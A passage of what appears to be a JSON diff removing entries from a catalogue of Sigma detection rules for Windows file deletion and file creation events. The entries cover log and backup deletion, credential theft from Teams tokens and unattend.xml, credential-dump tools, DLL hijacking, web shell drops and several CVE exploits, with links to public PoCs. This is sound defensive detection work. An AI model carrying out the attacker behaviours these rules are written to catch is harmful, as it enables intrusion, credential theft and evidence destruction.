"tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2022/01/16", - "filename": "file_delete_win_delete_appli_log.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", - "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", - "value": "Deletes Backup Files", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2022/01/02", - "filename": "file_delete_win_delete_backup_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitime usage" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deletion of a prefetch file (AntiForensic)", - "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "value": "Prefetch File Deletion", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2021/09/29", - "filename": "file_delete_win_delete_prefetch.yml", - "author": "Cedric MAURUGEON", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - 
"uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", - "value": "Exchange PowerShell Cmdlet History Deleted", - "meta": { - "refs": [ - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2022/10/26", - "filename": "file_delete_win_exchange_powershell_logs.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Possible FP during log rotation" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.", - "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", - "value": "Sysinternals SDelete File Deletion", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/9", - "https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2020/05/02", - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Legitime usage of SDelete" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", - "value": "Unusual File Deletion by 
dns.exe", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ], - "creation_date": "2022/09/27", - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deletion of WebServer access logs which may indicate an attempt to destroy forensic evidence", - "uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", - "value": "WebServer Access Logs Deleted", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_webserver_access_logs_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2022/09/16", - "filename": "file_delete_win_webserver_access_logs_deleted.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "During uninstallation of the IIS service", - "During log rotation" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "value": "Suspicious File Event With Teams Objects", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ], - "creation_date": "2022/09/16", - "filename": "file_event_win_access_susp_teams.yml", - "author": "@SerkinValery", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", - "uuid": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", - "value": "Suspicious Unattend.xml File Access", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2021/12/19", - "filename": "file_event_win_access_susp_unattend_xml.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.",
- "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa",
- "value": "Advanced IP Scanner - File Event",
- "meta": {
- "refs": [
- "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
- "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
- "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc",
- "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1046"
- ],
- "creation_date": "2020/05/12",
- "filename": "file_event_win_advanced_ip_scanner.yml",
- "author": "@ROxPinTeddy",
- "level": "medium",
- "falsepositive": [
- "Legitimate administrative use"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n",
- "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377",
- "value": "Anydesk Temporary Artefact",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/02/11",
- "filename": "file_event_win_anydesk_artefact.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate use"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects anydesk writing binaries files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it's highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n",
- "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211",
- "value": "Suspicious Binary Writes Via AnyDesk",
- "meta": {
- "refs": [
- "https://redcanary.com/blog/misbehaving-rats/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/09/28",
- "filename": "file_event_win_anydesk_writing_susp_binaries.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. 
The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.",
- "uuid": "3a3f81ca-652c-482b-adeb-b1c804727f74",
- "value": "Unidentified Attacker November 2018 - File",
- "meta": {
- "refs": [
- "https://twitter.com/DrunkBinary/status/1063075530180886529",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_apt_unidentified_nov_18.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1218.011"
- ],
- "creation_date": "2018/11/20",
- "filename": "file_event_win_apt_unidentified_nov_18.yml",
- "author": "@41thexplorer, Microsoft Defender ATP",
- "level": "high",
- "falsepositive": "No established falsepositives",
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects default file names outputted by the BloodHound collection tool SharpHound",
- "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab",
- "value": "BloodHound Collection Files",
- "meta": {
- "refs": [
- "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1087.001",
- "attack.t1087.002",
- "attack.t1482",
- "attack.t1069.001",
- "attack.t1069.002",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2022/08/09",
- "filename": "file_event_win_bloodhound_collection.yml",
- "author": "C.J. 
May",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used",
- "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489",
- "value": "CrackMapExec File Creation Patterns",
- "meta": {
- "refs": [
- "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ],
- "creation_date": "2022/03/12",
- "filename": "file_event_win_crackmapexec_patterns.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of system dlls that are not present on the system. 
Usualy to achieve dll hijacking",
- "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c",
- "value": "Creation Of Non-Existent DLLs In System Folders",
- "meta": {
- "refs": [
- "https://decoded.avast.io/martinchlumecky/png-steganography/",
- "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1574.001",
- "attack.t1574.002"
- ],
- "creation_date": "2022/12/01",
- "filename": "file_event_win_create_non_existent_dlls.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n",
- "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947",
- "value": "New Shim Database Created in the Default Directory",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.009"
- ],
- "creation_date": "2021/12/29",
- "filename": "file_event_win_creation_new_shim_database.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- 
"logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n",
- "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8",
- "value": "Suspicious Screensaver Binary File Creation",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546.002"
- ],
- "creation_date": "2021/12/29",
- "filename": "file_event_win_creation_scr_binary_file.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).",
- "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d",
- "value": "Files With System Process Name In Unsuspected Locations",
- "meta": {
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.005"
- ],
- "creation_date": "2020/05/26",
- "filename": "file_event_win_creation_system_file.yml",
- "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "System processes copied outside their default folders for testing purposes",
- "Third party software naming their software with the same names as the processes mentioned here"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- 
"description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n",
- "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9",
- "value": "Creation Exe for Service with Unquoted Path",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.009"
- ],
- "creation_date": "2021/12/30",
- "filename": "file_event_win_creation_unquoted_service_path.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation",
- "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6",
- "value": "Cred Dump Tools Dropped Files",
- "meta": {
- "refs": [
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001",
- "attack.t1003.002",
- "attack.t1003.003",
- "attack.t1003.004",
- "attack.t1003.005"
- ],
- "creation_date": "2019/11/01",
- "filename": "file_event_win_cred_dump_tools_dropped_files.yml",
- "author": "Teymur Kheirkhabarov, oscd.community",
- "level": "high",
- "falsepositive": [
- "Legitimate Administrator using tool for password recovery"
- ],
- "logsource.category": "file_event",
- "logsource.product": 
"windows"
- }
- },
- {
- "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe",
- "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127",
- "value": "WScript or CScript Dropper - File",
- "meta": {
- "refs": [
- "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2022/01/10",
- "filename": "file_event_win_cscript_wscript_dropper.yml",
- "author": "Tim Shelton",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n",
- "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0",
- "value": "Dynamic C Sharp Compile Artefact",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027.004"
- ],
- "creation_date": "2022/01/09",
- "filename": "file_event_win_csharp_compile_artefact.yml",
- "author": "frack113",
- "level": "low",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675",
- "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07",
- "value": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern",
- "meta": {
- 
"refs": [
- "https://github.com/hhlxf/PrintNightmare",
- "https://github.com/afwu/PrintNightmare",
- "https://github.com/cube0x0/CVE-2021-1675",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.privilege_escalation",
- "attack.resource_development",
- "attack.t1587",
- "cve.2021.1675"
- ],
- "creation_date": "2021/06/29",
- "filename": "file_event_win_cve_2021_1675_printspooler.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server\u2019s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n",
- "uuid": "b06335b3-55ac-4b41-937e-16b7f5d57dfd",
- "value": "CVE-2021-26858 Exchange Exploitation",
- "meta": {
- "refs": [
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_26858_msexchange.yml"
- ],
- "tags": [
- "attack.t1203",
- "attack.execution",
- "cve.2021.26858"
- ],
- "creation_date": "2021/03/03",
- "filename": "file_event_win_cve_2021_26858_msexchange.yml",
- "author": "Bhabesh Raj",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum",
- "uuid": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef",
- "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum",
- "meta": {
- "refs": [
- 
"https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/",
- "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1566",
- "attack.t1203",
- "cve.2021.33771",
- "cve.2021.31979"
- ],
- "creation_date": "2021/07/16",
- "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml",
- "author": "Sittikorn S",
- "level": "critical",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file",
- "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324",
- "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event",
- "meta": {
- "refs": [
- "https://github.com/klinix5/InstallerFileTakeOver",
- "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1068"
- ],
- "creation_date": "2021/11/22",
- "filename": "file_event_win_cve_2021_41379_msi_lpe.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown",
- "Possibly some Microsoft Edge upgrades"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)",
- "uuid": "7b501acf-fa98-4272-aa39-194f82edc8a3",
- "value": 
"CVE-2021-44077 POC Default Dropped File",
- "meta": {
- "refs": [
- "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
- "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml"
- ],
- "tags": [
- "attack.execution",
- "cve.2021.44077"
- ],
- "creation_date": "2022/06/06",
- "filename": "file_event_win_cve_2021_44077_poc_default_files.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache",
- "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7",
- "value": "CVE-2022-24527 Microsoft Connected Cache LPE",
- "meta": {
- "refs": [
- "https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1059.001",
- "cve.2022.24527"
- ],
- "creation_date": "2022/04/13",
- "filename": "file_event_win_cve_2022_24527_lpe.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n",
- "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b96",
- "value": "Powerup Write Hijack DLL",
- 
"meta": {
- "refs": [
- "https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_detect_powerup_dllhijacking.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.defense_evasion",
- "attack.t1574.001"
- ],
- "creation_date": "2021/08/21",
- "filename": "file_event_win_detect_powerup_dllhijacking.yml",
- "author": "Subhash Popuri (@pbssubhash)",
- "level": "high",
- "falsepositive": [
- "Any powershell script that creates bat files"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n",
- "uuid": "b6f91281-20aa-446a-b986-38a92813a18f",
- "value": "DLL Search Order Hijackig Via Additional Space in Path",
- "meta": {
- "refs": [
- "https://twitter.com/cyb3rops/status/1552932770464292864",
- "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.defense_evasion",
- "attack.t1574.002"
- ],
- "creation_date": "2022/07/30",
- "filename": "file_event_win_dll_sideloading_space_path.yml",
- "author": "frack113, Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under 
C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n",
- "uuid": "15904280-565c-4b73-9303-3291f964e7f9",
- "value": "Persistence Via ErrorHandler.Cmd",
- "meta": {
- "refs": [
- "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/",
- "https://github.com/last-byte/PersistenceSniper",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ],
- "creation_date": "2022/08/09",
- "filename": "file_event_win_error_handler_cmd_persistence.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder",
- "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6",
- "value": "Suspicious ASPX File Drop by Exchange",
- "meta": {
- "refs": [
- "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/",
- "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html",
- "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003"
- ],
- "creation_date": "2022/10/01",
- "filename": "file_event_win_exchange_webshell_drop.yml",
- "author": "Florian Roth (rule), MSTI (query, idea)",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious file type dropped by an Exchange 
component in IIS",
- "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6",
- "value": "Suspicious File Drop by Exchange",
- "meta": {
- "refs": [
- "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/",
- "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html",
- "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1190",
- "attack.initial_access",
